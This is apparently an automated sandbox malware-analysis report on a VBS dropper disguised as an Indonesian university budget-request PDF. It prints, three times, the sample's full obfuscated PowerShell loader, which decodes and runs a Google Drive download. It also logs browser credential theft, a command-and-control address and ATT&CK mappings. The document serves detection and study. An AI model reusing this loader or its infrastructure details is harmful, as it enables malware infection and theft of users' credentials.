                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "<#bjrgning indicerede afskrkkelsesvaabnenes halvfabrikatas myosuture skilteskrift pensils #>;$ammoniacs='befragters';<#avilion kendall kicking #>;$attesterende=$host.privatedata;if ($attesterende) {$jernbanelinier++;}function preeliminator($amagerhylde){$drukkenbolten=$chaussure+$amagerhylde.length-$jernbanelinier;for( $getling=5;$getling -lt $drukkenbolten;$getling+=6){$nordfljs180+=$amagerhylde[$getling];}$nordfljs180;}function glederens($floraer207){ & ($eftertragtelsers) ($floraer207);}$spisefrikvarteret=preeliminator 'gelatmphotoosdsupzss ori o belqu etlrenataamphi/ tilh5ve an.not r0udson ind c(afgaswsanitilabi nharpudptomaobetraw pl nsa.cum vedblnn,nmet stfo so.si1 a ne0opium.jetti0foraa;,nman b,lthwmodtai k otn ern6ratba4tynds;koldk supe xlegac6cellm4 triu;rolni vindermlescvmods,:per c1parti2 pre 1et al.savne0edgew)belly trickgs.cceeheltic afgrkoleogoventr/blods2 .isq0s,uth1froko0s nsi0konde1selek0batus1udkry detonfh spiivillargenn eblubbfciffeosalatxlabba/midte1 ver,2 v rg1 over.kem i0 oni ';$melton=preeliminator ' handuunivesafs neunexprfrema- blk ajackfgbr gaedekann uflytadnex ';$tessituras160=preeliminator 'fristhkvi dtb dbatlow,ip.recaslejei:e ter/amati/s.mlidpret rspeedihandlvsyzyge pati.ove sg ri.godemisopelviguncleltwatceunsu .exo,ecunco ofiskemmi mo/mongcusja,kcagrar? de.memrkatx .ackp fantohkkerrconvetoblig=nulpudsstteojordewenaarnreceplskinnogla sa opsadk mmu&cir uisv dsdmerin=drift1nondeqslutmt tyk okonsekidesvbgyno jpagodw andglstikplintenxnonde3.erved liniwclonkbwall.cdivisg au,orgl tslspina8nonciqsy eczzairiataxam0bonnnhkendeysynenupa il0mackiwsyndrtsundasudskrj gnis7syvaa ';$reskaleringen=preeliminator 's,rig>yu ca ';$eftertragtelsers=preeliminator 'beaveieforeeattacx,ekto ';$amazonernes='chromophoric';$cogida='\reebok.dia';glederens (preeliminator 'lazur$svmmegproatlk ledocatalbrealiabulbolda ks:cam ov recreovervrlistedvaskoe di inwa,ersthorphudv simattessenegts amnomavefrindfrikornfs prudk raile reoxsverds=polem$fusenedimminhal,fv intr:bj.rgapseudph micpbekradmajesas efftorakla ortr+blin $reawoc blinobudmagdestii coundmemoraelekt ');glederens (preeliminator 'jingl$mayb ggadenlstikkomust b knapacourtlpligt:croaptan ihrheroleparadbhy era k ncnhete ejanifn lsni=sente$ const mysteoutbls sikks pseuipatentsta iualb.tr,utokapachoslevef1 m,mo6fer d0 chem.unshissta dp.bseslstockiscourtbr sk( hete$someortoot.etros s analklokalakreatl .epteunfurrbarduisarconstiklgantife lab n lat,) anga ');glederens (preeliminator 'flyde[s.empn i.laenaziptdinor.yestesforneerigorrkennevdybsiihortecsalicescootptabacofacahihairin ma gt ,entmapplia lil ntreadadisd gsamlee commrembub]bitte:cycli:gastrsfeltheheateca foru rnearaflsei ongotfie dy .odspavle randreo blegtcastioop,racstyreomu tilseism pres =udhal opspa[ bhutn afk.e knitt udga.,artjs ropdebundlcresilus rivreks.mi tiftt rsuypaperphenver huxto mulitboy,ooforskc unceoksneh
                Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "<#bjrgning indicerede afskrkkelsesvaabnenes halvfabrikatas myosuture skilteskrift pensils #>;$ammoniacs='befragters';<#avilion kendall kicking #>;$attesterende=$host.privatedata;if ($attesterende) {$jernbanelinier++;}function preeliminator($amagerhylde){$drukkenbolten=$chaussure+$amagerhylde.length-$jernbanelinier;for( $getling=5;$getling -lt $drukkenbolten;$getling+=6){$nordfljs180+=$amagerhylde[$getling];}$nordfljs180;}function glederens($floraer207){ & ($eftertragtelsers) ($floraer207);}$spisefrikvarteret=preeliminator 'gelatmphotoosdsupzss ori o belqu etlrenataamphi/ tilh5ve an.not r0udson ind c(afgaswsanitilabi nharpudptomaobetraw pl nsa.cum vedblnn,nmet stfo so.si1 a ne0opium.jetti0foraa;,nman b,lthwmodtai k otn ern6ratba4tynds;koldk supe xlegac6cellm4 triu;rolni vindermlescvmods,:per c1parti2 pre 1et al.savne0edgew)belly trickgs.cceeheltic afgrkoleogoventr/blods2 .isq0s,uth1froko0s nsi0konde1selek0batus1udkry detonfh spiivillargenn eblubbfciffeosalatxlabba/midte1 ver,2 v rg1 over.kem i0 oni ';$melton=preeliminator ' handuunivesafs neunexprfrema- blk ajackfgbr gaedekann uflytadnex ';$tessituras160=preeliminator 'fristhkvi dtb dbatlow,ip.recaslejei:e ter/amati/s.mlidpret rspeedihandlvsyzyge pati.ove sg ri.godemisopelviguncleltwatceunsu .exo,ecunco ofiskemmi mo/mongcusja,kcagrar? de.memrkatx .ackp fantohkkerrconvetoblig=nulpudsstteojordewenaarnreceplskinnogla sa opsadk mmu&cir uisv dsdmerin=drift1nondeqslutmt tyk okonsekidesvbgyno jpagodw andglstikplintenxnonde3.erved liniwclonkbwall.cdivisg au,orgl tslspina8nonciqsy eczzairiataxam0bonnnhkendeysynenupa il0mackiwsyndrtsundasudskrj gnis7syvaa ';$reskaleringen=preeliminator 's,rig>yu ca ';$eftertragtelsers=preeliminator 'beaveieforeeattacx,ekto ';$amazonernes='chromophoric';$cogida='\reebok.dia';glederens (preeliminator 'lazur$svmmegproatlk ledocatalbrealiabulbolda ks:cam ov recreovervrlistedvaskoe di inwa,ersthorphudv simattessenegts amnomavefrindfrikornfs prudk raile reoxsverds=polem$fusenedimminhal,fv intr:bj.rgapseudph micpbekradmajesas efftorakla ortr+blin $reawoc blinobudmagdestii coundmemoraelekt ');glederens (preeliminator 'jingl$mayb ggadenlstikkomust b knapacourtlpligt:croaptan ihrheroleparadbhy era k ncnhete ejanifn lsni=sente$ const mysteoutbls sikks pseuipatentsta iualb.tr,utokapachoslevef1 m,mo6fer d0 chem.unshissta dp.bseslstockiscourtbr sk( hete$someortoot.etros s analklokalakreatl .epteunfurrbarduisarconstiklgantife lab n lat,) anga ');glederens (preeliminator 'flyde[s.empn i.laenaziptdinor.yestesforneerigorrkennevdybsiihortecsalicescootptabacofacahihairin ma gt ,entmapplia lil ntreadadisd gsamlee commrembub]bitte:cycli:gastrsfeltheheateca foru rnearaflsei ongotfie dy .odspavle randreo blegtcastioop,racstyreomu tilseism pres =udhal opspa[ bhutn afk.e knitt udga.,artjs ropdebundlcresilus rivreks.mi tiftt rsuypaperphenver huxto mulitboy,ooforskc unceoksneh
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "<#bjrgning indicerede afskrkkelsesvaabnenes halvfabrikatas myosuture skilteskrift pensils #>;$ammoniacs='befragters';<#avilion kendall kicking #>;$attesterende=$host.privatedata;if ($attesterende) {$jernbanelinier++;}function preeliminator($amagerhylde){$drukkenbolten=$chaussure+$amagerhylde.length-$jernbanelinier;for( $getling=5;$getling -lt $drukkenbolten;$getling+=6){$nordfljs180+=$amagerhylde[$getling];}$nordfljs180;}function glederens($floraer207){ & ($eftertragtelsers) ($floraer207);}$spisefrikvarteret=preeliminator 'gelatmphotoosdsupzss ori o belqu etlrenataamphi/ tilh5ve an.not r0udson ind c(afgaswsanitilabi nharpudptomaobetraw pl nsa.cum vedblnn,nmet stfo so.si1 a ne0opium.jetti0foraa;,nman b,lthwmodtai k otn ern6ratba4tynds;koldk supe xlegac6cellm4 triu;rolni vindermlescvmods,:per c1parti2 pre 1et al.savne0edgew)belly trickgs.cceeheltic afgrkoleogoventr/blods2 .isq0s,uth1froko0s nsi0konde1selek0batus1udkry detonfh spiivillargenn eblubbfciffeosalatxlabba/midte1 ver,2 v rg1 over.kem i0 oni ';$melton=preeliminator ' handuunivesafs neunexprfrema- blk ajackfgbr gaedekann uflytadnex ';$tessituras160=preeliminator 'fristhkvi dtb dbatlow,ip.recaslejei:e ter/amati/s.mlidpret rspeedihandlvsyzyge pati.ove sg ri.godemisopelviguncleltwatceunsu .exo,ecunco ofiskemmi mo/mongcusja,kcagrar? de.memrkatx .ackp fantohkkerrconvetoblig=nulpudsstteojordewenaarnreceplskinnogla sa opsadk mmu&cir uisv dsdmerin=drift1nondeqslutmt tyk okonsekidesvbgyno jpagodw andglstikplintenxnonde3.erved liniwclonkbwall.cdivisg au,orgl tslspina8nonciqsy eczzairiataxam0bonnnhkendeysynenupa il0mackiwsyndrtsundasudskrj gnis7syvaa ';$reskaleringen=preeliminator 's,rig>yu ca ';$eftertragtelsers=preeliminator 'beaveieforeeattacx,ekto ';$amazonernes='chromophoric';$cogida='\reebok.dia';glederens (preeliminator 'lazur$svmmegproatlk ledocatalbrealiabulbolda ks:cam ov recreovervrlistedvaskoe di inwa,ersthorphudv simattessenegts amnomavefrindfrikornfs prudk raile reoxsverds=polem$fusenedimminhal,fv intr:bj.rgapseudph micpbekradmajesas efftorakla ortr+blin $reawoc blinobudmagdestii coundmemoraelekt ');glederens (preeliminator 'jingl$mayb ggadenlstikkomust b knapacourtlpligt:croaptan ihrheroleparadbhy era k ncnhete ejanifn lsni=sente$ const mysteoutbls sikks pseuipatentsta iualb.tr,utokapachoslevef1 m,mo6fer d0 chem.unshissta dp.bseslstockiscourtbr sk( hete$someortoot.etros s analklokalakreatl .epteunfurrbarduisarconstiklgantife lab n lat,) anga ');glederens (preeliminator 'flyde[s.empn i.laenaziptdinor.yestesforneerigorrkennevdybsiihortecsalicescootptabacofacahihairin ma gt ,entmapplia lil ntreadadisd gsamlee commrembub]bitte:cycli:gastrsfeltheheateca foru rnearaflsei ongotfie dy .odspavle randreo blegtcastioop,racstyreomu tilseism pres =udhal opspa[ bhutn afk.e knitt udga.,artjs ropdebundlcresilus rivreks.mi tiftt rsuypaperphenver huxto mulitboy,ooforskc unceoksnehJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: dump.pcap, type: PCAP
                Source: Yara matchFile source: 00000008.00000002.2948258092.00000000042ED000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 8076, type: MEMORYSTR
                Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: dump.pcap, type: PCAP
                Source: Yara matchFile source: 00000008.00000002.2948258092.00000000042ED000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 8076, type: MEMORYSTR
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity Information221
                Scripting
                Valid Accounts1
                Windows Management Instrumentation
                221
                Scripting
                111
                Process Injection
                1
                Masquerading
                1
                OS Credential Dumping
                1
                Security Software Discovery
                Remote Services1
                Data from Local System
                1
                Encrypted Channel
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts2
                Command and Scripting Interpreter
                1
                DLL Side-Loading
                1
                DLL Side-Loading
                31
                Virtualization/Sandbox Evasion
                LSASS Memory1
                Process Discovery
                Remote Desktop ProtocolData from Removable Media1
                Ingress Tool Transfer
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain Accounts1
                Exploitation for Client Execution
                Logon Script (Windows)Logon Script (Windows)111
                Process Injection
                Security Account Manager31
                Virtualization/Sandbox Evasion
                SMB/Windows Admin SharesData from Network Shared Drive3
                Non-Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal Accounts2
                PowerShell
                Login HookLogin Hook1
                Obfuscated Files or Information
                NTDS1
                Application Window Discovery
                Distributed Component Object ModelInput Capture14
                Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Software Packing
                LSA Secrets1
                File and Directory Discovery
                SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                DLL Side-Loading
                Cached Domain Credentials13
                System Information Discovery
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1523886 Sample: PERMINTAAN ANGGARAN (Univer... Startdate: 02/10/2024 Architecture: WINDOWS Score: 100 26 18.31.95.13.in-addr.arpa 2->26 28 drive.usercontent.google.com 2->28 30 drive.google.com 2->30 42 Multi AV Scanner detection for domain / URL 2->42 44 Suricata IDS alerts for network traffic 2->44 46 Malicious sample detected (through community Yara rule) 2->46 48 7 other signatures 2->48 8 wscript.exe 1 2->8         started        11 powershell.exe 15 2->11         started        signatures3 process4 signatures5 50 VBScript performs obfuscated calls to suspicious functions 8->50 52 Suspicious powershell command line found 8->52 54 Wscript starts Powershell (via cmd or directly) 8->54 60 2 other signatures 8->60 13 powershell.exe 14 20 8->13         started        56 Writes to foreign memory regions 11->56 58 Found suspicious powershell code related to unpacking or dynamic code loading 11->58 17 msiexec.exe 1 86 11->17         started        20 conhost.exe 11->20         started        process6 dnsIp7 32 drive.usercontent.google.com 142.250.186.33, 443, 49732 GOOGLEUS United States 13->32 34 drive.google.com 172.217.18.14, 443, 49730, 49731 GOOGLEUS United States 13->34 62 Found suspicious powershell code related to unpacking or dynamic code loading 13->62 22 conhost.exe 13->22         started        36 137.184.191.215, 59084, 59085, 59086 PANDGUS United States 17->36 38 142.250.186.161, 443, 59083 GOOGLEUS United States 17->38 40 172.217.18.110, 443, 59082 GOOGLEUS United States 17->40 24 C:\Users\user\AppData\Roaming\...\31437F.exe, PE32 17->24 dropped 64 Tries to harvest and steal browser information (history, passwords, etc) 17->64 file8 signatures9 process10

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                PERMINTAAN ANGGARAN (Universitas IPB) ID177888#U00b7pdf.vbs18%ReversingLabsWin32.Trojan.Leonem
                PERMINTAAN ANGGARAN (Universitas IPB) ID177888#U00b7pdf.vbs21%VirustotalBrowse
                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Roaming\188E93\31437F.exe0%ReversingLabs
                C:\Users\user\AppData\Roaming\188E93\31437F.exe0%VirustotalBrowse
                No Antivirus matches
                SourceDetectionScannerLabelLink
                18.31.95.13.in-addr.arpa0%VirustotalBrowse
                drive.google.com0%VirustotalBrowse
                drive.usercontent.google.com1%VirustotalBrowse
                SourceDetectionScannerLabelLink
                http://nuget.org/NuGet.exe0%URL Reputationsafe
                http://nuget.org/NuGet.exe0%URL Reputationsafe
                http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                https://go.micro0%URL Reputationsafe
                https://contoso.com/License0%URL Reputationsafe
                https://contoso.com/Icon0%URL Reputationsafe
                https://aka.ms/pscore6lB0%URL Reputationsafe
                https://contoso.com/0%URL Reputationsafe
                https://nuget.org/nuget.exe0%URL Reputationsafe
                https://aka.ms/pscore680%URL Reputationsafe
                https://apis.google.com0%URL Reputationsafe
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                http://www.apache.org/licenses/LICENSE-2.0.html0%VirustotalBrowse
                http://drive.usercontent.google.com1%VirustotalBrowse
                https://drive.usercontent.google.com/1%VirustotalBrowse
                https://wordpress.org/documentation/article/faq-troubleshooting/0%VirustotalBrowse
                https://www.google.com0%VirustotalBrowse
                https://drive.google.com/0%VirustotalBrowse
                https://drive.google.com0%VirustotalBrowse
                http://drive.google.com0%VirustotalBrowse
                https://drive.usercontent.google.com1%VirustotalBrowse
                https://github.com/Pester/Pester1%VirustotalBrowse
                http://137.184.191.215/index.php/check.php?s=am9ntjjw16%VirustotalBrowse
                NameIPActiveMaliciousAntivirus DetectionReputation
                drive.google.com
                172.217.18.14
                truefalseunknown
                drive.usercontent.google.com
                142.250.186.33
                truefalseunknown
                18.31.95.13.in-addr.arpa
                unknown
                unknowntrueunknown
                NameMaliciousAntivirus DetectionReputation
                http://137.184.191.215/index.php/check.php?s=am9ntjjwtrueunknown
                NameSourceMaliciousAntivirus DetectionReputation
                http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.1895124133.00000211A38F4000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                unknown
                https://drive.usercontent.google.com/-msiexec.exe, 00000008.00000003.2158130127.0000000004360000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2228849049.0000000004327000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.2948258092.0000000004328000.00000004.00000020.00020000.00000000.sdmpfalse
                  unknown
                  http://drive.usercontent.google.compowershell.exe, 00000001.00000002.1864327822.0000021195A66000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1864327822.0000021195640000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                  http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000001.00000002.1864327822.0000021193AA7000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000001.00000002.1864327822.0000021193AA7000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                  https://go.micropowershell.exe, 00000001.00000002.1864327822.0000021194746000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://contoso.com/Licensepowershell.exe, 00000001.00000002.1895124133.00000211A38F4000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://contoso.com/Iconpowershell.exe, 00000001.00000002.1895124133.00000211A38F4000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://drive.googPpowershell.exe, 00000001.00000002.1864327822.00000211955FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1864327822.00000211959D4000.00000004.00000800.00020000.00000000.sdmpfalse
                    unknown
                    https://wordpress.org/documentation/article/faq-troubleshooting/msiexec.exe, 00000008.00000002.2948258092.00000000042ED000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                    https://drive.usercontent.googhpowershell.exe, 00000001.00000002.1864327822.0000021195629000.00000004.00000800.00020000.00000000.sdmpfalse
                      unknown
                      https://drive.usercontent.google.com/msiexec.exe, 00000008.00000003.2158130127.0000000004360000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2228849049.0000000004327000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.2948258092.0000000004328000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                      http://drive.google.compowershell.exe, 00000001.00000002.1864327822.00000211959D4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1864327822.0000021195604000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                      https://drive.google.com/7hmsiexec.exe, 00000008.00000002.2948258092.00000000042AA000.00000004.00000020.00020000.00000000.sdmpfalse
                        unknown
                        https://github.com/Pester/Pesterpowershell.exe, 00000001.00000002.1864327822.0000021193AA7000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                        https://drive.usercontent.google.com/Hmsiexec.exe, 00000008.00000003.2158130127.0000000004360000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2228849049.0000000004327000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.2948258092.0000000004328000.00000004.00000020.00020000.00000000.sdmpfalse
                          unknown
                          https://www.google.compowershell.exe, 00000001.00000002.1864327822.0000021193D19000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1864327822.0000021195629000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2126102585.0000000004363000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                          https://aka.ms/pscore6lBpowershell.exe, 00000004.00000002.2690295829.00000000045E1000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://drive.google.com/msiexec.exe, 00000008.00000002.2948258092.00000000042AA000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                          https://contoso.com/powershell.exe, 00000001.00000002.1895124133.00000211A38F4000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.1895124133.00000211A38F4000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://drive.google.compowershell.exe, 00000001.00000002.1864327822.00000211955FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1864327822.00000211959D4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1864327822.0000021193AA7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1864327822.0000021193D2B000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                          https://drive.usercontent.google.compowershell.exe, 00000001.00000002.1864327822.0000021193D19000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1864327822.0000021195A66000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1864327822.0000021195629000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                          https://aka.ms/pscore68powershell.exe, 00000001.00000002.1864327822.0000021193881000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://apis.google.compowershell.exe, 00000001.00000002.1864327822.0000021193D19000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1864327822.0000021195629000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2126102585.0000000004363000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.1864327822.0000021193881000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2690295829.00000000045E1000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://drive.usercontent.google.com/6msiexec.exe, 00000008.00000003.2158130127.0000000004360000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2228849049.0000000004327000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.2948258092.0000000004328000.00000004.00000020.00020000.00000000.sdmpfalse
                            unknown
                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs
                            IPDomainCountryFlagASNASN NameMalicious
                            142.250.186.161
                            unknownUnited States
                            15169GOOGLEUSfalse
                            137.184.191.215
                            unknownUnited States
                            11003PANDGUStrue
                            172.217.18.14
                            drive.google.comUnited States
                            15169GOOGLEUSfalse
                            172.217.18.110
                            unknownUnited States
                            15169GOOGLEUSfalse
                            142.250.186.33
                            drive.usercontent.google.comUnited States
                            15169GOOGLEUSfalse
                            Joe Sandbox version:41.0.0 Charoite
                            Analysis ID:1523886
                            Start date and time:2024-10-02 07:17:28 +02:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 4m 33s
